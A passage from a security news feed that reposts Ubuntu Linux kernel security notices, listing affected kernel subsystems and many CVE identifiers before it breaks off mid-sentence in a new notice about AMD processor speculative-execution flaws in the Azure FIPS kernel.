  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Performance monitor drivers;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Power supply drivers;
  - RapidIO drivers;
  - RAS (Reliability, Availability, Serviceability) subsystem;
  - Remote Processor subsystem;
  - RPMSG subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - MediaTek SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - Texas Instruments SoC drivers;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - ChipIdea USB driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - DesignWare USB3 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - USB over IP driver;
  - vDPA drivers;
  - VFIO drivers;
  - Virtio Host (VHOST) subsystem;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FAT file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - JFS file system;
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Proc file system;
  - Pstore file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Audit subsystem;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Kernel kexec() syscall;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - RCU subsystem;
  - Scheduler infrastructure;
  - Cryptographic library;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - 9P file system network protocol;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - KCM (Kernel Connection Multiplexor) sockets driver;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - AppArmor security module;
  - Landlock security;
  - Simplified Mandatory Access Control Kernel framework;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40005, CVE-2025-40135, CVE-2025-40150, CVE-2025-68175,
CVE-2025-68239, CVE-2025-68334, CVE-2025-68736, CVE-2025-71152,
CVE-2025-71161, CVE-2025-71203, CVE-2025-71221, CVE-2025-71229,
CVE-2025-71231, CVE-2025-71232, CVE-2025-71233, CVE-2025-71235,
CVE-2025-71236, CVE-2025-71237, CVE-2025-71238, CVE-2025-71239,
CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2025-71269,
CVE-2025-71272, CVE-2025-71273, CVE-2025-71274, CVE-2025-71286,
CVE-2025-71287, CVE-2025-71288, CVE-2025-71291, CVE-2025-71292,
CVE-2025-71294, CVE-2025-71295, CVE-2025-71297, CVE-2025-71304,
CVE-2025-71305, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23100, CVE-2026-23104,
CVE-2026-23118, CVE-2026-23138, CVE-2026-23154, CVE-2026-23157,
CVE-2026-23169, CVE-2026-23171, CVE-2026-23220, CVE-2026-23221,
CVE-2026-23222, CVE-2026-23226, CVE-2026-23227, CVE-2026-23228,
CVE-2026-23229, CVE-2026-23230, CVE-2026-23233, CVE-2026-23234,
CVE-2026-23235, CVE-2026-23236, CVE-2026-23237, CVE-2026-23238,
CVE-2026-23241, CVE-2026-23242, CVE-2026-23243, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23249, CVE-2026-23253,
CVE-2026-23255, CVE-2026-23266, CVE-2026-23267, CVE-2026-23270,
CVE-2026-23271, CVE-2026-23272, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23278, CVE-2026-23279, CVE-2026-23281, CVE-2026-23284,
CVE-2026-23285, CVE-2026-23286, CVE-2026-23287, CVE-2026-23289,
CVE-2026-23290, CVE-2026-23291, CVE-2026-23292, CVE-2026-23293,
CVE-2026-23296, CVE-2026-23298, CVE-2026-23300, CVE-2026-23302,
CVE-2026-23303, CVE-2026-23304, CVE-2026-23306, CVE-2026-23307,
CVE-2026-23308, CVE-2026-23310, CVE-2026-23312, CVE-2026-23313,
CVE-2026-23315, CVE-2026-23317, CVE-2026-23318, CVE-2026-23319,
CVE-2026-23321, CVE-2026-23324, CVE-2026-23325, CVE-2026-23330,
CVE-2026-23334, CVE-2026-23335, CVE-2026-23336, CVE-2026-23339,
CVE-2026-23340, CVE-2026-23343, CVE-2026-23347, CVE-2026-23352,
CVE-2026-23356, CVE-2026-23357, CVE-2026-23359, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23392, CVE-2026-23395, CVE-2026-23396,
CVE-2026-23397, CVE-2026-23398, CVE-2026-23399, CVE-2026-23401,
CVE-2026-23412, CVE-2026-23413, CVE-2026-23414, CVE-2026-23418,
CVE-2026-23419, CVE-2026-23420, CVE-2026-23426, CVE-2026-23428,
CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23440,
CVE-2026-23441, CVE-2026-23442, CVE-2026-23444, CVE-2026-23446,
CVE-2026-23447, CVE-2026-23448, CVE-2026-23449, CVE-2026-23450,
CVE-2026-23452, CVE-2026-23454, CVE-2026-23455, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31402, CVE-2026-31403, CVE-2026-31405, CVE-2026-31407,
CVE-2026-31408, CVE-2026-31409, CVE-2026-31411, CVE-2026-31412,
CVE-2026-31414, CVE-2026-31415, CVE-2026-31416, CVE-2026-31417,
CVE-2026-31418, CVE-2026-31421, CVE-2026-31422, CVE-2026-31423,
CVE-2026-31424, CVE-2026-31425, CVE-2026-31426, CVE-2026-31427,
CVE-2026-31428, CVE-2026-31429, CVE-2026-31430, CVE-2026-31432,
CVE-2026-31433, CVE-2026-31436, CVE-2026-31438, CVE-2026-31439,
CVE-2026-31440, CVE-2026-31441, CVE-2026-31446, CVE-2026-31447,
CVE-2026-31448, CVE-2026-31449, CVE-2026-31450, CVE-2026-31451,
CVE-2026-31452, CVE-2026-31453, CVE-2026-31454, CVE-2026-31455,
CVE-2026-31458, CVE-2026-31464, CVE-2026-31466, CVE-2026-31467,
CVE-2026-31469, CVE-2026-31470, CVE-2026-31473, CVE-2026-31474,
CVE-2026-31476, CVE-2026-31477, CVE-2026-31478, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31607, CVE-2026-31610, CVE-2026-31611, CVE-2026-31612,
CVE-2026-31613, CVE-2026-31615, CVE-2026-31616, CVE-2026-31617,
CVE-2026-31618, CVE-2026-31619, CVE-2026-31622, CVE-2026-31623,
CVE-2026-31624, CVE-2026-31625, CVE-2026-31626, CVE-2026-31627,
CVE-2026-31628, CVE-2026-31629, CVE-2026-31634, CVE-2026-31637,
CVE-2026-31638, CVE-2026-31639, CVE-2026-31642, CVE-2026-31645,
CVE-2026-31646, CVE-2026-31648, CVE-2026-31649, CVE-2026-31651,
CVE-2026-31655, CVE-2026-31656, CVE-2026-31657, CVE-2026-31658,
CVE-2026-31659, CVE-2026-31660, CVE-2026-31661, CVE-2026-31662,
CVE-2026-31664, CVE-2026-31665, CVE-2026-31667, CVE-2026-31668,
CVE-2026-31669, CVE-2026-31670, CVE-2026-31671, CVE-2026-31672,
CVE-2026-31673, CVE-2026-31674, CVE-2026-31675, CVE-2026-31677,
CVE-2026-31678, CVE-2026-31679, CVE-2026-31680, CVE-2026-31681,
CVE-2026-31682, CVE-2026-31683, CVE-2026-31684, CVE-2026-31685,
CVE-2026-31686, CVE-2026-31687, CVE-2026-31689, CVE-2026-31693,
CVE-2026-31694, CVE-2026-31695, CVE-2026-31696, CVE-2026-31697,
CVE-2026-31698, CVE-2026-31699, CVE-2026-31700, CVE-2026-31701,
CVE-2026-31702, CVE-2026-31704, CVE-2026-31705, CVE-2026-31706,
CVE-2026-31707, CVE-2026-31708, CVE-2026-31709, CVE-2026-31711,
CVE-2026-31712, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31720, CVE-2026-31721, CVE-2026-31722, CVE-2026-31723,
CVE-2026-31724, CVE-2026-31725, CVE-2026-31726, CVE-2026-31728,
CVE-2026-31729, CVE-2026-31730, CVE-2026-31731, CVE-2026-31737,
CVE-2026-31738, CVE-2026-31740, CVE-2026-31741, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31767, CVE-2026-31768, CVE-2026-31770, CVE-2026-31772,
CVE-2026-31773, CVE-2026-31778, CVE-2026-31779, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43007, CVE-2026-43011,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43037,
CVE-2026-43038, CVE-2026-43040, CVE-2026-43041, CVE-2026-43043,
CVE-2026-43044, CVE-2026-43046, CVE-2026-43047, CVE-2026-43049,
CVE-2026-43050, CVE-2026-43051, CVE-2026-43052, CVE-2026-43054,
CVE-2026-43056, CVE-2026-43057, CVE-2026-43058, CVE-2026-43059,
CVE-2026-43060, CVE-2026-43061, CVE-2026-43062, CVE-2026-43064,
CVE-2026-43065, CVE-2026-43066, CVE-2026-43068, CVE-2026-43069,
CVE-2026-43071, CVE-2026-43072, CVE-2026-43073, CVE-2026-43074,
CVE-2026-43075, CVE-2026-43076, CVE-2026-43079, CVE-2026-43080,
CVE-2026-43081, CVE-2026-43082, CVE-2026-43085, CVE-2026-43086,
CVE-2026-43088, CVE-2026-43089, CVE-2026-43091, CVE-2026-43092,
CVE-2026-43093, CVE-2026-43094, CVE-2026-43098, CVE-2026-43099,
CVE-2026-43103, CVE-2026-43104, CVE-2026-43105, CVE-2026-43107,
CVE-2026-43109, CVE-2026-43110, CVE-2026-43111, CVE-2026-43112,
CVE-2026-43113, CVE-2026-43114, CVE-2026-43117, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43123, CVE-2026-43124, CVE-2026-43128,
CVE-2026-43129, CVE-2026-43130, CVE-2026-43132, CVE-2026-43133,
CVE-2026-43134, CVE-2026-43135, CVE-2026-43136, CVE-2026-43137,
CVE-2026-43139, CVE-2026-43140, CVE-2026-43141, CVE-2026-43143,
CVE-2026-43145, CVE-2026-43147, CVE-2026-43148, CVE-2026-43149,
CVE-2026-43150, CVE-2026-43152, CVE-2026-43153, CVE-2026-43156,
CVE-2026-43157, CVE-2026-43158, CVE-2026-43159, CVE-2026-43162,
CVE-2026-43163, CVE-2026-43167, CVE-2026-43168, CVE-2026-43169,
CVE-2026-43170, CVE-2026-43171, CVE-2026-43173, CVE-2026-43175,
CVE-2026-43180, CVE-2026-43182, CVE-2026-43183, CVE-2026-43184,
CVE-2026-43185, CVE-2026-43186, CVE-2026-43187, CVE-2026-43189,
CVE-2026-43190, CVE-2026-43194, CVE-2026-43196, CVE-2026-43199,
CVE-2026-43200, CVE-2026-43201, CVE-2026-43202, CVE-2026-43203,
CVE-2026-43205, CVE-2026-43206, CVE-2026-43207, CVE-2026-43209,
CVE-2026-43211, CVE-2026-43214, CVE-2026-43215, CVE-2026-43218,
CVE-2026-43221, CVE-2026-43222, CVE-2026-43223, CVE-2026-43225,
CVE-2026-43226, CVE-2026-43227, CVE-2026-43230, CVE-2026-43231,
CVE-2026-43232, CVE-2026-43233, CVE-2026-43236, CVE-2026-43238,
CVE-2026-43239, CVE-2026-43241, CVE-2026-43242, CVE-2026-43244,
CVE-2026-43245, CVE-2026-43246, CVE-2026-43248, CVE-2026-43249,
CVE-2026-43250, CVE-2026-43251, CVE-2026-43252, CVE-2026-43253,
CVE-2026-43255, CVE-2026-43256, CVE-2026-43257, CVE-2026-43261,
CVE-2026-43262, CVE-2026-43264, CVE-2026-43265, CVE-2026-43266,
CVE-2026-43268, CVE-2026-43269, CVE-2026-43270, CVE-2026-43271,
CVE-2026-43273, CVE-2026-43275, CVE-2026-43277, CVE-2026-43278,
CVE-2026-43279, CVE-2026-43281, CVE-2026-43283, CVE-2026-43287,
CVE-2026-43288, CVE-2026-43289, CVE-2026-43291, CVE-2026-43295,
CVE-2026-43296, CVE-2026-43297, CVE-2026-43300, CVE-2026-43302,
CVE-2026-43304, CVE-2026-43312, CVE-2026-43313, CVE-2026-43314,
CVE-2026-43315, CVE-2026-43316, CVE-2026-43317, CVE-2026-43318,
CVE-2026-43319, CVE-2026-43320, CVE-2026-43324, CVE-2026-43327,
CVE-2026-43328, CVE-2026-43329, CVE-2026-43330, CVE-2026-43332,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43338,
CVE-2026-43339, CVE-2026-43340, CVE-2026-43341, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43372, CVE-2026-43373, CVE-2026-43377,
CVE-2026-43378, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43383, CVE-2026-43384, CVE-2026-43386, CVE-2026-43387,
CVE-2026-43395, CVE-2026-43397, CVE-2026-43405, CVE-2026-43406,
CVE-2026-43407, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43414, CVE-2026-43415,
CVE-2026-43419, CVE-2026-43420, CVE-2026-43421, CVE-2026-43424,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43436,
CVE-2026-43437, CVE-2026-43439, CVE-2026-43441, CVE-2026-43445,
CVE-2026-43448, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43455, CVE-2026-43456,
CVE-2026-43457, CVE-2026-43458, CVE-2026-43459, CVE-2026-43466,
CVE-2026-43467, CVE-2026-43468, CVE-2026-43469, CVE-2026-43471,
CVE-2026-43472, CVE-2026-43473, CVE-2026-43475, CVE-2026-43476,
CVE-2026-43480, CVE-2026-43483, CVE-2026-43484, CVE-2026-43488,
CVE-2026-43490, CVE-2026-43491, CVE-2026-43492, CVE-2026-43493,
CVE-2026-43495, CVE-2026-43496, CVE-2026-43497, CVE-2026-43499,
CVE-2026-43501, CVE-2026-43502, CVE-2026-45834, CVE-2026-45835,
CVE-2026-45836, CVE-2026-45838, CVE-2026-45839, CVE-2026-45840,
CVE-2026-45841, CVE-2026-45842, CVE-2026-45843, CVE-2026-45844,
CVE-2026-45845, CVE-2026-45846, CVE-2026-45847, CVE-2026-45848,
CVE-2026-45849, CVE-2026-45851, CVE-2026-45852, CVE-2026-45855,
CVE-2026-45856, CVE-2026-45857, CVE-2026-45858, CVE-2026-45859,
CVE-2026-45860, CVE-2026-45861, CVE-2026-45862, CVE-2026-45864,
CVE-2026-45865, CVE-2026-45866, CVE-2026-45867, CVE-2026-45868,
CVE-2026-45869, CVE-2026-45870, CVE-2026-45871, CVE-2026-45872,
CVE-2026-45873, CVE-2026-45875, CVE-2026-45877, CVE-2026-45878,
CVE-2026-45879, CVE-2026-45880, CVE-2026-45881, CVE-2026-45882,
CVE-2026-45883, CVE-2026-45884, CVE-2026-45885, CVE-2026-45886,
CVE-2026-45890, CVE-2026-45891, CVE-2026-45893, CVE-2026-45895,
CVE-2026-45899, CVE-2026-45902, CVE-2026-45904, CVE-2026-45905,
CVE-2026-45910, CVE-2026-45911, CVE-2026-45912, CVE-2026-45913,
CVE-2026-45914, CVE-2026-45915, CVE-2026-45916, CVE-2026-45917,
CVE-2026-45919, CVE-2026-45920, CVE-2026-45921, CVE-2026-45923,
CVE-2026-45924, CVE-2026-45928, CVE-2026-45935, CVE-2026-45936,
CVE-2026-45938, CVE-2026-45941, CVE-2026-45942, CVE-2026-45943,
CVE-2026-45946, CVE-2026-45947, CVE-2026-45948, CVE-2026-45954,
CVE-2026-45956, CVE-2026-45957, CVE-2026-45958, CVE-2026-45960,
CVE-2026-45962, CVE-2026-45964, CVE-2026-45965, CVE-2026-45968,
CVE-2026-45969, CVE-2026-45970, CVE-2026-45972, CVE-2026-45973,
CVE-2026-45974, CVE-2026-45976, CVE-2026-45978, CVE-2026-45981,
CVE-2026-45982, CVE-2026-45983, CVE-2026-45984, CVE-2026-45985,
CVE-2026-45986, CVE-2026-45987, CVE-2026-45988, CVE-2026-45989,
CVE-2026-45991, CVE-2026-45994, CVE-2026-45996, CVE-2026-45997,
CVE-2026-45999, CVE-2026-46002, CVE-2026-46003, CVE-2026-46004,
CVE-2026-46005, CVE-2026-46006, CVE-2026-46007, CVE-2026-46009,
CVE-2026-46011, CVE-2026-46012, CVE-2026-46015, CVE-2026-46016,
CVE-2026-46018, CVE-2026-46019, CVE-2026-46021, CVE-2026-46022,
CVE-2026-46023, CVE-2026-46024, CVE-2026-46026, CVE-2026-46027,
CVE-2026-46031, CVE-2026-46033, CVE-2026-46037, CVE-2026-46038,
CVE-2026-46040, CVE-2026-46041, CVE-2026-46043, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46115, CVE-2026-46116, CVE-2026-46117, CVE-2026-46119,
CVE-2026-46120, CVE-2026-46121, CVE-2026-46122, CVE-2026-46123,
CVE-2026-46124, CVE-2026-46125, CVE-2026-46126, CVE-2026-46127,
CVE-2026-46128, CVE-2026-46129, CVE-2026-46131, CVE-2026-46132,
CVE-2026-46133, CVE-2026-46135, CVE-2026-46136, CVE-2026-46137,
CVE-2026-46138, CVE-2026-46139, CVE-2026-46142, CVE-2026-46143,
CVE-2026-46144, CVE-2026-46145, CVE-2026-46146, CVE-2026-46149,
CVE-2026-46150, CVE-2026-46151, CVE-2026-46152, CVE-2026-46157,
CVE-2026-46159, CVE-2026-46160, CVE-2026-46161, CVE-2026-46163,
CVE-2026-46164, CVE-2026-46167, CVE-2026-46168, CVE-2026-46169,
CVE-2026-46172, CVE-2026-46173, CVE-2026-46174, CVE-2026-46176,
CVE-2026-46177, CVE-2026-46178, CVE-2026-46179, CVE-2026-46180,
CVE-2026-46184, CVE-2026-46185, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46195, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46204, CVE-2026-46205, CVE-2026-46206, CVE-2026-46207,
CVE-2026-46208, CVE-2026-46209, CVE-2026-46211, CVE-2026-46212,
CVE-2026-46214, CVE-2026-46218, CVE-2026-46219, CVE-2026-46220,
CVE-2026-46225, CVE-2026-46226, CVE-2026-46227, CVE-2026-46229,
CVE-2026-46230, CVE-2026-46231, CVE-2026-46232, CVE-2026-46233,
CVE-2026-46234, CVE-2026-46235, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46241, CVE-2026-46243, CVE-2026-46244, CVE-2026-46246,
CVE-2026-46247, CVE-2026-46249, CVE-2026-46250, CVE-2026-46251,
CVE-2026-46253, CVE-2026-46254, CVE-2026-46255, CVE-2026-46259,
CVE-2026-46260, CVE-2026-46261, CVE-2026-46265, CVE-2026-46266,
CVE-2026-46267, CVE-2026-46270, CVE-2026-46273, CVE-2026-46274,
CVE-2026-46280, CVE-2026-46282, CVE-2026-46285, CVE-2026-46286,
CVE-2026-46287, CVE-2026-46289, CVE-2026-46291, CVE-2026-46292,
CVE-2026-46293, CVE-2026-46294, CVE-2026-46296, CVE-2026-46299,
CVE-2026-46301, CVE-2026-46303, CVE-2026-46304, CVE-2026-46306,
CVE-2026-46307, CVE-2026-46312, CVE-2026-46314, CVE-2026-46319,
CVE-2026-46328, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53369,
CVE-2026-53374, CVE-2026-53375, CVE-2026-53376, CVE-2026-53379,
CVE-2026-63838, CVE-2026-63843, CVE-2026-63844, CVE-2026-63845,
CVE-2026-63846, CVE-2026-63847, CVE-2026-63848, CVE-2026-63851,
CVE-2026-63852, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63860, CVE-2026-63861, CVE-2026-63862, CVE-2026-63865,
CVE-2026-64018, CVE-2026-64034)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8608-1: Linux kernel (Azure FIPS) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691496/unix-server/usn-8608-1-linux-kernel-azure-fips-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691496/unix-server/usn-8608-1-linux-kernel-azure-fips-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 14:17:38 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
